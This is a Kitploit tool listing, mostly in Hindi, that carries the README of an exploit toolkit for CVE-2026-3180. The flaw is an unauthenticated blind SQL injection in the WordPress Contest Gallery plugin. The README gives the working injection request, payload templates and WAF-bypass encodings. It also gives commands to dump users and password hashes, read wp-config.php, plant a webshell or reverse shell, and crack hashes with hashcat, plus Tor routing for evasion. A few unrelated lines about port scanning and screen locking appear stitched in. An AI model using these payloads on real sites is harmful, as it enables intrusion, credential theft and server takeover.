Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WP-Contest-Gallery-28.1.4-Exploit — CVE-2026-3180 के लिए पूर्ण शोषण टूलकिट - WordPress Contest Gallery SQL Injection कमजोरी। इसमें स्वचालित डेटा निष्कर्षण, WAF बाईपास, रिवर्स शेल, SQLMap एकीकरण, Burp एक्सटेंशन जनरेशन और पेनिट्रेशन टेस्टिंग तथा सुरक्षा अनुसंधान के लिए रिपोर्टिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/wp-contest-gallery-28.1.4-exploit
पासवर्ड क्रैकिंगभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubcerberusmrxi/wp-contest-gallery-28.1.4-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WP-Contest-Gallery-28.1.4-Exploit

CVE-2026-3180 के लिए पूर्ण शोषण टूलकिट - WordPress Contest Gallery SQL Injection कमजोरी। इसमें स्वचालित डेटा निष्कर्षण, WAF बाईपास, रिवर्स शेल, SQLMap एकीकरण, Burp एक्सटेंशन जनरेशन और पेनिट्रेशन टेस्टिंग तथा सुरक्षा अनुसंधान के लिए रिपोर्टिंग शामिल है।

रिपॉजिटरी देखें
1151 महीना पहलेअभी तक समीक्षित नहीं
⚠️ परीक्षणाधीन
यह PoC सक्रिय रूप से परीक्षण और परिष्कृत किया जा रहा है। सुविधाएँ रिलीज़ के बीच बदल सकती हैं।

CVE-2026-3180

WordPress Contest Gallery — अप्रमाणित ब्लाइंड SQL इंजेक्शन

Python Version CVSS License Platform

CVE-2026-3180 के लिए प्रूफ-ऑफ-कॉन्सेप्ट मूल्यांकन उपकरण
लेखक: Sudeepa Wanigarathna · मूल खोज: cardosource


[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन प्रणालियों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेता है।


विषय सूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग गाइड
  • आदेश संदर्भ
  • इंजेक्शन तकनीकें
  • WAF बाईपास
  • डेटा निष्कर्षण
  • एकीकरण
  • हमला श्रृंखला
  • आउटपुट और रिपोर्ट
  • Docker
  • CI/CD एकीकरण
  • समस्या निवारण
  • रिपॉजिटरी लेआउट
  • संस्करण इतिहास
  • अस्वीकरण
  • लेखक और क्रेडिट्स

अवलोकन

CVE-2026-3180 वर्डप्रेस Contest Gallery प्लगइन में एक उच्च-गंभीरता, अप्रमाणित ब्लाइंड SQL इंजेक्शन है। यह दोष post_cg1l_resend_unconfirmed_mail_frontend AJAX हैंडलर में मौजूद है, जहाँ cgl_mail पैरामीटर को उचित स्वच्छता के बिना SQL क्वेरी में पास किया जाता है।

यह रिपॉजिटरी अधिकृत सुरक्षा पेशेवरों के लिए एक पूर्ण-विशेषताओं वाला Python PoC (v2.0) प्रदान करता है ताकि प्रभाव को मान्य किया जा सके, वर्डप्रेस डेटा निकाला जा सके, रिपोर्ट तैयार की जा सके, और उद्योग-मानक उपकरणों (SQLMap, Burp Suite, Nuclei) के साथ एकीकृत किया जा सके।

wp

भेद्यता विवरण

प्रभावित एंडपॉइंट

फ़ील्डमान

प्रूफ-ऑफ-कॉन्सेप्ट अनुरोध```http

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded

action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20

root@kitploit:~
### संदर्भ

- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [मूल लेख (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)

---

## विशेषताएँ

### मुख्य शोषण

| क्षमता | विवरण |
|---|---|
| भेद्यता पहचान | बूलियन, समय-आधारित, त्रुटि-आधारित, यूनियन और स्टैक्ड क्वेरी परीक्षण |
| अंध निष्कर्षण | बूलियन अनुमान के माध्यम से बाइनरी-खोज वर्ण निष्कर्षण |
| पूर्ण डेटा डंप | उपयोगकर्ता, डेटाबेस मेटाडेटा, विकल्प, प्लगइन्स, थीम, पोस्ट, तालिकाएँ |
| इंटरैक्टिव SQL शेल | बैकएंड के विरुद्ध मनमानी `SELECT` क्वेरी चलाएँ |
| wp-config.php निष्कर्षण | सामान्य पथों के विरुद्ध `LOAD_FILE()` प्रयास |
| रिवर्स शेल | PHP वेबशेल `INTO OUTFILE` / `DUMPFILE` के माध्यम से लिखें (जब अनुमति हो) |

### चोरी और प्रदर्शन

| क्षमता | विवरण |
|---|---|
| WAF बायपास | 15+ एन्कोडिंग और अस्पष्टीकरण तकनीकें |
| मल्टी-थ्रेडिंग | तेज निष्कर्षण के लिए कॉन्फ़िगरेबल वर्कर थ्रेड |
| दर सीमित करना | अनुरोधों के बीच कॉन्फ़िगरेबल विलंब |
| पुनः प्रयास तर्क | क्षणिक विफलताओं पर स्वचालित पुनः प्रयास |
| यूज़र-एजेंट रोटेशन | प्रति अनुरोध यादृच्छिक ब्राउज़र फिंगरप्रिंट |
| प्रॉक्सी समर्थन | HTTP/SOCKS प्रॉक्सी और Tor (`socks5h://127.0.0.1:9050`) |

### रिपोर्टिंग और एकीकरण

| क्षमता | विवरण |
|---|---|
| रिपोर्ट निर्माण | निष्कर्षण सारांश के साथ JSON और HTML रिपोर्ट |
| SQLMap एकीकरण | टैम्पर्स के साथ स्वचालित SQLMap कमांड उत्पन्न करें |
| Burp Suite एक्सटेंशन | जनरेटर + स्टैंडअलोन `burp_contest_gallery.py` |
| Nuclei टेम्पलेट | सामूहिक पहचान के लिए YAML टेम्पलेट |
| Metasploit मॉड्यूल | Ruby सहायक मॉड्यूल (`contest_gallery_sqli.rb`) |
| शेल ऑटोमेशन | curl-आधारित और SQLMap वर्कफ़्लो के लिए Bash स्क्रिप्ट |

### संचालन

| क्षमता | विवरण |
|---|---|
| रंगीन CLI आउटपुट | गंभीरता स्तरों के साथ संरचित लॉगिंग |
| प्रगति ट्रैकिंग | रीयल-टाइम मीट्रिक (अनुरोध, समय, निष्कर्षण गति) |
| शांत / विस्तृत मोड | स्क्रिप्टिंग और डिबगिंग के लिए उपयुक्त |
| सिग्नल हैंडलिंग | `Ctrl+C` पर सुचारू सफाई |
| Docker तैयार | कंटेनरीकृत तैनाती समर्थन |
| CI/CD पाइपलाइन तैयार | ऑटोमेशन के लिए एग्जिट कोड और JSON आउटपुट |

---

## स्थापना

### पूर्वापेक्षाएँ

- Python **3.8+**
- `pip`
- परीक्षण के तहत लक्ष्य तक नेटवर्क पहुंच

### वैकल्पिक बाहरी उपकरण

| उपकरण | उद्देश्य |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | स्वचालित SQL इंजेक्शन |
| [Burp Suite](https://portswigger.net/burp) | मैनुअल परीक्षण और एक्सटेंशन होस्टिंग |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | टेम्पलेट-आधारित स्कैनिंग |
| [Hashcat](https://hashcat.net/hashcat/) | ऑफलाइन हैश क्रैकिंग |
| [Tor](https://www.torproject.org/) | अनाम रूटिंग (`--proxy tor`) |

### सेटअप```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2026-3180.py --help

निर्भरताएँ

आवश्यक (रनटाइम):```text requests>=2.31.0

root@kitploit:~
**अनुशंसित (requirements.txt से):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0

मुख्य एक्सप्लॉइट केवल Python मानक लाइब्रेरी और requests का उपयोग करता है। अतिरिक्त पैकेज आउटपुट और रिपोर्टिंग को बेहतर बनाते हैं।


त्वरित आरंभ

http://target.example को केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।

भेद्यता जांचें```bash

python3 cve-2026-3180.py http://target.example --scan

root@kitploit:~
### पूर्ण शोषण (पता लगाना + निकालना)```bash
python3 cve-2026-3180.py http://target.example

वर्डप्रेस उपयोगकर्ताओं को डंप करें```bash

python3 cve-2026-3180.py http://target.example --dump users

root@kitploit:~
### इंटरैक्टिव SQL शेल```bash
python3 cve-2026-3180.py http://target.example --sql-shell

HTML रिपोर्ट उत्पन्न करें```bash

python3 cve-2026-3180.py http://target.example --report html -o assessment.html

root@kitploit:~
### Burp प्रॉक्सी के माध्यम से```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v

उपयोग गाइड

केवल भेद्यता स्कैन```bash

python3 cve-2026-3180.py http://target.example --scan

root@kitploit:~
बूलियन, समय-आधारित और त्रुटि-आधारित पहचान को पूर्ण निष्कर्षण के बिना चलाता है।

### पूर्ण डेटा निष्कर्षण```bash
python3 cve-2026-3180.py http://target.example --dump all

डेटाबेस जानकारी, उपयोगकर्ता, विकल्प, प्लगइन्स, थीम, पोस्ट, तालिकाएँ और सिस्टम मेटाडेटा निकालता है।

चयनित डंप```bash

python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes

root@kitploit:~
### इंटरैक्टिव SQL शेल```bash
python3 cve-2026-3180.py http://target.example --sql-shell

PORT स्कैनिंग रेंज निर्दिष्ट करें, जैसे 1-1000 या 80,443,8080।

पोर्ट फॉर्मेट

  • एकल पोर्ट: 80
  • पोर्ट रेंज: 1-1000
  • कॉमा से अलग किए गए पोर्ट: 80,443,8080
  • मिश्रण: 80,443,8000-9000

पोर्ट स्कैनिंग मोड

  • -p- = सभी 65535 पोर्ट को स्कैन करें
  • --top-ports 1000 = शीर्ष 1000 पोर्ट को स्कैन करें (Nmap की तरह)
  • --top-ports डिफ़ॉल्ट रूप से शीर्ष 1000 पोर्ट का उपयोग करता है```text sql> SELECT DATABASE() wordpress

sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]

sql> show tables ["wp_users", "wp_posts", "wp_options", ...]

sql> exit

root@kitploit:~
**शेल कमांड:**

| कमांड | विवरण |
|---|---|
| `SELECT ...` | SQL क्वेरी निष्पादित करें और परिणाम प्रिंट करें |
| `show users` | कैश्ड निकाले गए उपयोगकर्ताओं को प्रदर्शित करें |
| `show tables` | कैश्ड तालिका सूची प्रदर्शित करें |
| `show database` | कैश्ड DB मेटाडेटा प्रदर्शित करें |
| `show config` | यदि निकाला गया हो तो wp-config.php प्रदर्शित करें |
| `show options` | WordPress विकल्प प्रदर्शित करें |
| `show plugins` | सक्रिय प्लगइन्स प्रदर्शित करें |
| `help` | उपलब्ध कमांड सूचीबद्ध करें |
| `exit` / `quit` | शेल से बाहर निकलें |

### रिपोर्ट जनरेशन```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json

# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html

Reverse shell (केवल अधिकृत प्रयोगशाला)```bash

Terminal 1 — listener

nc -lvnp 4444

Terminal 2 — exploit

python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444

root@kitploit:~
> इसके लिए `FILE` विशेषाधिकार, लिखने योग्य webroot, और `secure_file_priv` द्वारा लक्ष्य पथ को अवरुद्ध न करने की आवश्यकता है।

### SQLMap कमांड जनरेशन```bash
python3 cve-2026-3180.py http://target.example --sqlmap

या बंडल की गई ऑटोमेशन स्क्रिप्ट का उपयोग करें:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example

root@kitploit:~
### Burp Suite एक्सटेंशन```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension

# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py

Nuclei टेम्पलेट```bash

python3 cve-2026-3180.py http://target.example --nuclei-template

Scan with generated template

nuclei -u http://target.example -t CVE-2026-3180.yaml

root@kitploit:~
### Bash ऑटोमेशन (कोई Python नहीं)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example

Tor रूटिंग```bash

Ensure Tor is running on 127.0.0.1:9050

python3 cve-2026-3180.py http://target.example --proxy tor

root@kitploit:~
### प्रदर्शन ट्यूनिंग```bash
python3 cve-2026-3180.py http://target.example \
  --threads 20 \
  --timeout 15 \
  --delay 0.1 \
  --retries 5 \
  -v

कमांड संदर्भ

स्थितीय तर्क

तर्कविवरण
targetलक्ष्य WordPress आधार URL (जैसे http://target.example)

नेटवर्क विकल्प

आउटपुट विकल्प

तर्कविवरण
--verbose, -vडीबग लॉगिंग सक्षम करें
--quietकंसोल आउटपुट दबाएं
--output, -o

मोड


इंजेक्शन तकनीकें

यह टूल स्वचालित रूप से कई इंजेक्शन रणनीतियों का परीक्षण और उपयोग करता है:

पेलोड टेम्पलेट

PayloadManager 12+ इंजेक्शन टेम्पलेट्स में घूमता है:```text 'OR//{condition}#@teste.com 'OR{condition}-- - ')OR{condition}# '))OR{condition}# 'OR//{condition}OR//'1'='1'# 'UNION//SELECT{condition}# ...

root@kitploit:~
### बूलियन निष्कर्षण एल्गोरिदम

1. सत्य/असत्य आधार रेखा लंबाई के माध्यम से कमजोरी की पुष्टि करें
2. लक्ष्य क्वेरी परिणाम की `LENGTH()` का बाइनरी-खोज करें
3. प्रति वर्ण स्थिति के लिए `ASCII(SUBSTRING(...))` का बाइनरी-खोज करें
4. निकाले गए वर्णों से पूर्ण स्ट्रिंग इकट्ठा करें

---

## WAF बाईपास

बिल्ट-इन अस्पष्टीकरण तकनीकें यादृच्छिक रूप से या मांग पर लागू की जाती हैं:

| तकनीक | विवरण |
|---|---|
| `comment_obfuscation` | रिक्त स्थानों को `/**/`, `/*!*/`, `-- `, `#` से बदलें |
| `case_variation` | वर्णमाला वर्णों में यादृच्छिक अपर/लोअर केस |
| `url_encoding` | मानक प्रतिशत-एन्कोडिंग |
| `double_url_encoding` | नेस्टेड प्रतिशत-एन्कोडिंग |
| `hex_encoding` | `%41`-शैली हेक्स एन्कोडिंग |
| `unicode_encoding` | `%u0041`-शैली यूनिकोड एन्कोडिंग |
| `white_space_variation` | रिक्त स्थानों के बजाय टैब, नई पंक्तियाँ, फॉर्म फीड |
| `keyword_obfuscation` | कीवर्ड विभाजित करें: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | `CHAR()` को `\|\|` के माध्यम से जोड़ना |
| `char_obfuscation` | `CHAR()` को `+` के माध्यम से जोड़ना |

रूपांतरित पेलोड का उदाहरण:```text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com

डेटा निष्कर्षण

निष्कर्षण लक्ष्य

निकाले गए उपयोगकर्ता ऑब्जेक्ट का आकार```json

{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }

root@kitploit:~
### पासवर्ड हैश क्रैकिंग (ऑफ़लाइन)

निष्कर्षण के बाद, Hashcat के साथ WordPress phpass हैश को क्रैक करें:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json

# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

एकीकरण

SQLMap

उत्पन्न आदेश (--sqlmap के माध्यम से):```bash sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs

root@kitploit:~
### Burp Suite

1. `burp_contest_gallery.py` को **Extender → Extensions → Add** में लोड करें  
2. **CVE-2026-3180** टैब खोलें  
3. लक्ष्य URL दर्ज करें और **Exploit** पर क्लिक करें  
4. पैसिव स्कैनर AJAX अनुरोधों की जाँच करता है Contest Gallery संकेतकों के लिए  

### Nuclei```yaml
id: CVE-2026-3180
info:
  name: WordPress Contest Gallery SQL Injection
  severity: high
  classification:
    cve-id: CVE-2026-3180
    cvss-score: 7.5

requests:
  - method: POST
    path: /wp-admin/admin-ajax.php
    body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"

Metasploit```bash

Copy module to Metasploit

cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/

Run

msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"

root@kitploit:~
## हमला श्रृंखला```mermaid
flowchart TD
    A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
    B --> C{"Injection type?"}
    C -->|Boolean| D["Response length inference"]
    C -->|Time| E["SLEEP delay inference"]
    C -->|Error| F["SQL error leakage"]
    D --> G["Binary-search extraction"]
    E --> G
    F --> G
    G --> H["WordPress data exfiltration"]
    H --> I["Users / hashes / options / config"]
    I --> J["Optional: OUTFILE webshell"]

तकनीकी सारांश

  1. प्रवेश बिंदु — Contest Gallery प्लगइन में post_cg1l_resend_unconfirmed_mail_frontend AJAX क्रिया।
  2. सिंक — cgl_mail मान बिना पैरामीटरीकरण के SQL में संयोजित किया गया।
  3. शोषण — अंध बूलियन अनुमान डेटा को वर्ण-दर-वर्ण निकालता है।
  4. प्रभाव — WordPress डेटाबेस तक पूर्ण पढ़ने की पहुंच; यदि MySQL अनुमतियां अनुमति दें तो संभावित फ़ाइल लेखन।

आउटपुट और रिपोर्ट

कंसोल आउटपुट```text

[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!

root@kitploit:~
### JSON रिपोर्ट संरचना```json
{
  "metadata": {
    "cve": "CVE-2026-3180",
    "cvss_score": "7.5 (High)",
    "type": "boolean_based"
  },
  "target": {
    "url": "http://target.example",
    "ajax_url": "http://target.example/wp-admin/admin-ajax.php"
  },
  "vulnerability": {
    "vulnerable": true,
    "type": "boolean_based"
  },
  "extracted_data": {
    "database": { "name": "wordpress", "version": "8.0.35" },
    "users": [],
    "tables": [],
    "plugins": [],
    "options": {}
  },
  "summary": {
    "users_found": 3,
    "tables_found": 12,
    "plugins_found": 8,
    "config_extracted": false
  }
}

रिपोर्ट्स डिफ़ॉल्ट रूप से reports/ में सहेजी जाती हैं।


Docker```dockerfile

FROM python:3.11-slim

WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt

ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]

root@kitploit:~
प्रोग्राम से पहले आपके कंप्यूटर स्क्रीन को ब्लॉक करेगा और आपके कीबोर्ड को लॉक कर देगा।```bash
# Build
docker build -t cve-2026-3180 .

# Scan
docker run --rm cve-2026-3180 http://target.example --scan

# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
  http://target.example --report json

CI/CD एकीकरण

अधिकृत स्टेजिंग स्कैन के लिए उदाहरण GitHub Actions वर्कफ़्लो:```yaml name: CVE-2026-3180 Staging Scan

on: workflow_dispatch: schedule: - cron: '0 2 * * 1'

jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4

root@kitploit:~
  - uses: actions/setup-python@v5
    with:
      python-version: '3.11'

  - run: pip install -r requirements.txt

  - name: Vulnerability scan
    run: |
      python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
        --scan --quiet
    continue-on-error: true

  - name: Generate report
    run: |
      python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
        --report json -o reports/staging.json

  - uses: actions/upload-artifact@v4
    with:
      name: security-report
      path: reports/
root@kitploit:~
---

## समस्या निवारण

| लक्षण | क्या प्रयास करें |
|---|---|
| लक्ष्य भेद्य नहीं है | सुनिश्चित करें Contest Gallery ≤ 28.1.4 स्थापित और सक्रिय है |
| प्रतिक्रिया लंबाई में कोई अंतर नहीं | समय-आधारित फॉलबैक के लिए `--scan` आज़माएं; `--timeout` बढ़ाएं |
| बहुत धीमा निष्कर्षण | `--threads` बढ़ाएं; सावधानी से `--delay` घटाएं |
| कनेक्शन त्रुटियां | `--timeout` और `--retries` बढ़ाएं; प्रॉक्सी सेटिंग्स जांचें |
| WAF अनुरोधों को ब्लॉक कर रहा है | `--proxy tor` का उपयोग करें; टूल स्वचालित रूप से बाइपास तकनीक लागू करता है |
| Tor प्रॉक्सी विफल होता है | `127.0.0.1:9050` पर Tor की पुष्टि करें; यदि आवश्यक हो तो `requests[socks]` स्थापित करें |
| खाली उपयोगकर्ता डंप | टेबल प्रीफ़िक्स `wp_` नहीं हो सकता; कस्टम क्वेरीज़ के साथ `--sql-shell` का उपयोग करें |
| wp-config नहीं मिला | वैकल्पिक `LOAD_FILE()` पथ के साथ `--sql-shell` आज़माएं |
| रिवर्स शेल विफल होता है | `FILE` विशेषाधिकार, `secure_file_priv`, वेबरूट अनुमतियां जांचें |

### डीबग कार्यप्रवाह```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v

# Through Burp
python3 cve-2026-3180.py http://target.example \
  --proxy http://127.0.0.1:8080 -v --scan

# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
  -d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
  -w "\nSize: %{size_download}\n"

रिपॉजिटरी लेआउट```text

exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)

root@kitploit:~
---

## संस्करण इतिहास

### v2.0.0 — अल्टीमेट संस्करण (जनवरी 2026)

- Boolean, time, error, union, and stacked injection detection  
- पूर्ण वर्डप्रेस डेटा निष्कर्षण पाइपलाइन  
- 15+ WAF बायपास तकनीकें  
- इंटरैक्टिव SQL शेल  
- JSON / HTML रिपोर्ट जनरेशन  
- SQLMap, Burp, और Nuclei इंटीग्रेशन  
- `INTO OUTFILE` के माध्यम से रिवर्स शेल  
- प्रॉक्सी और Tor समर्थन  
- रीट्री लॉजिक के साथ मल्टी-थ्रेडिंग  
- रंगीन आउटपुट और संरचित लॉगिंग  

### v1.0 — प्रारंभिक रिलीज़

- बुनियादी boolean-आधारित डिटेक्शन  
- मैन्युअल उपयोगकर्ता निष्कर्षण  

---

## अस्वीकरण

यह प्रोजेक्ट **जैसे हैं वैसे** **रक्षात्मक सुरक्षा अनुसंधान** और **अधिकृत पैठ परीक्षण** के लिए प्रदान किया गया है।

इस सॉफ्टवेयर का उपयोग करके आप सहमत हैं कि:

1. आप केवल उन सिस्टमों को लक्षित करेंगे जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं।  
2. आप लागू कंप्यूटर-दुरुपयोग और डेटा-सुरक्षा कानूनों को समझते हैं।  
3. लेखक और योगदानकर्ता दुरुपयोग से होने वाली क्षति, डेटा हानि, या कानूनी परिणामों के लिए **जिम्मेदार नहीं हैं**।  

यदि आप उत्पादन में इस कमजोरी की खोज करते हैं, तो जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और जहां उपयुक्त हो प्लगइन विक्रेता / वर्डप्रेस सुरक्षा टीम के साथ समन्वय करें।

---

## लेखक और श्रेय

| भूमिका | नाम |
|---|---|
| **उपकरण लेखक** | Sudeepa Wanigarathna |
| **मूल खोज** | cardosource |
| **CVE** | CVE-2026-3180 |
| **लाइसेंस** | MIT |

---

## लाइसेंस```
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

समर्थन

  • यह आपके शोध में मदद करता है तो रिपॉजिटरी को स्टार करें
  • बग, झूठी सकारात्मकता (false positives) या पहचान सुधार के लिए इश्यू खोलें
  • डॉक्स, WAF बायपास तकनीकों और अधिकृत-लैब UX के लिए पुल अनुरोधों का स्वागत है

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें
गुणमान
CVE IDCVE-2026-3180
CVSS7.5 (उच्च)
हमला वेक्टरनेटवर्क — अप्रमाणित
प्रभावगोपनीयता उल्लंघन, डेटाबेस पढ़ना, क्रेडेंशियल चोरी
प्रभावित उत्पादWordPress Contest Gallery प्लगइन
प्रभावित संस्करण28.1.4 और पुराने
भेद्यता प्रकारब्लाइंड SQL इंजेक्शन
DBMSMySQL / MariaDB
URL/wp-admin/admin-ajax.php
MethodPOST
Actionpost_cg1l_resend_unconfirmed_mail_frontend
भेद्य पैरामीटरcgl_mail
तर्कडिफ़ॉल्टविवरण
--proxy—प्रॉक्सी URL या Tor के माध्यम से SOCKS5 के लिए tor
--timeout10HTTP अनुरोध टाइमआउट (सेकंड)
--delay0.05अनुरोधों के बीच विलंब (सेकंड)
--retries3असफल अनुरोधों पर पुनः प्रयास संख्या
--threads, -t5थ्रेड पूल आकार
कस्टम आउटपुट फ़ाइल पथ
तर्कविवरण
(डिफ़ॉल्ट)पूर्ण शोषण: पता लगाएं → स्कैन करें → सभी निकालें
--scanकेवल कमजोरी का पता लगाना
--sql-shellइंटरैक्टिव SQL शेल
--dump {users,config,database,options,plugins,themes,all}विशिष्ट डेटा निकालें
--report {json,html}मूल्यांकन रिपोर्ट उत्पन्न करें
--reverse-shell LHOST LPORTफ़ाइल लेखन के माध्यम से रिवर्स शेल का प्रयास करें
--sqlmapSQLMap कमांड प्रिंट करें
--burp-extensionBurp Suite एक्सटेंशन उत्पन्न करें
--nuclei-templateNuclei YAML टेम्पलेट उत्पन्न करें
प्रकारपता लगाने की विधिउपयोग का मामला
बूलियन-आधारितप्रतिक्रिया लंबाई अंतर (1=1 बनाम 1=2)प्राथमिक निष्कर्षण इंजन
समय-आधारितSLEEP() विलंब अनुमानजब बूलियन संकेत कमजोर हों तो बैकअप
त्रुटि-आधारितEXTRACTVALUE() / SQL त्रुटि स्ट्रिंगजब त्रुटियां लीक होती हैं तो तेज़ मेटाडेटा
यूनियन-आधारितUNION SELECT पेलोडप्रत्यक्ष मान पुनर्प्राप्ति (जब लागू हो)
स्टैक्ड क्वेरीज़'; ... # सिंटैक्सबहु-कथन निष्पादन (दुर्लभ)
लक्ष्यSQL स्रोतआउटपुट कुंजी
डेटाबेस नामSELECT DATABASE()database.name
डेटाबेस संस्करणSELECT VERSION()database.version
डेटाबेस उपयोगकर्ताSELECT USER()database.user
तालिकाएँinformation_schema.TABLEStables[]
स्तंभinformation_schema.COLUMNScolumns{}
WP उपयोगकर्ताwp_usersusers[]
पासवर्ड हैशwp_users.user_passusers[].password_hash
ईमेलwp_users.user_emailusers[].email
भूमिकाएँwp_usermeta क्षमताएँusers[].roles
साइट विकल्पwp_optionsoptions{}
सक्रिय प्लगइन्सwp_options.active_pluginsplugins[]
थीमtemplate / stylesheet विकल्पthemes[]
पोस्टwp_postsposts[]
wp-config.phpLOAD_FILE('/var/www/html/wp-config.php')config
सिस्टम जानकारी@@hostname, @@datadir, आदिsystem_info{}